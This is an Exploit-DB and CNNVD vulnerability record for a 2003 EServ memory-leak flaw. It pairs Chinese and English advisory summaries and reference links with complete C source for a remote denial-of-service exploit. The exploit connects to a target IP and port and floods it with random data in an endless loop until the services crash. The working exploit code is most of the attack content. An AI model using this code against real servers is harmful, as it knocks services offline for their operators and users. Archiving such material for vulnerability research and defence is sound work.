https://www.exploit-db.com/exploits/22586
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-090

Eserv是一款集成Mail、News、Web、FTP和代理服务器的系统。Eserv服务程序错误的处理打开的连接，远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击。Eserv连接处理程序包含一个内存泄露问题，当接收到一个连接后，服务器会在堆中分配8到32K字节的内存，但当连接不再存在的情况下Eserv没有正确的释放连接所使用的内存，可导致内存泄露，攻击者提交超多的成功连接，使用的内存会过多，而使系统不稳定。如一般在1，000个连接之后，会泄露78MB到312MB的内存。

source: http://www.securityfocus.com/bid/7552/info
 
A denial of service vulnerability has been reported for EServ. The vulnerability exists due to the way the server handles connections. Specifically, memory allocated for open connections are not properly freed when a connection no longer exists. This will result in a consumption of all available memory resources.
 
**It has been reported that EServ version 3.0 previously thought to be invulnerable to this issue is affected by this vulnerability. This version was tested on Windows 2000.
 
This vulnerability affects EServ 2.92 to 3.0. 

/* m00-eServ-fun.c
 *
 *  EServ/2.95-3.00 remote memory-leak exploit
 *
 *  Result: exiting program and close all services
 *  if you seen message: Broken pipe
 *  then may going drink beer 8)
 *
 *  Eserv 3.0 only web(80) services susceptible on this DoS
 *
 *  rash / m00.void.ru
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{  
  char buf[2000];
  int fd;
  struct sockaddr_in rsin;

  if (argc!=3) {
   printf("n usage: %s <ip> <port>nn", argv[0]);
   exit(0);  
  }
  
  rsin.sin_family = AF_INET;
  rsin.sin_port   = htons(atoi(argv[2]));
  rsin.sin_addr.s_addr = inet_addr(argv[1]);
 
  for (fd=0;fd<2000;fd++)
    buf[fd]=(int *)((rand()*10));
  
  fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);             
  if (connect(fd,(struct sockaddr *)&rsin,sizeof(struct sockaddr))) perror("[-] connect()"),exit(0);
  printf("[+] connected..n"); 
  printf("[+] send data to host..n"); 
  
  while (1) {
   if ((send(fd, buf, 2000, 0))<0)      
     break;  
  }   
}

来源:BUGTRAQ
名称:20030513eServMemoryLeakSolution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105284631428187&w;=2
来源:BUGTRAQ
名称:20030511eServMemoryLeakEnablesDenialofServiceAttacks
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105284630228137&w;=2
来源:XF
名称:eserv-multiple-connections-dos(11973)
链接:http://xforce.iss.net/xforce/xfdb/11973
来源:BID
名称:7552
链接:http://www.securityfocus.com/bid/7552
来源:VULNWATCH
名称:20030511eServMemoryLeakEnablesDenialofServiceAttacks
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html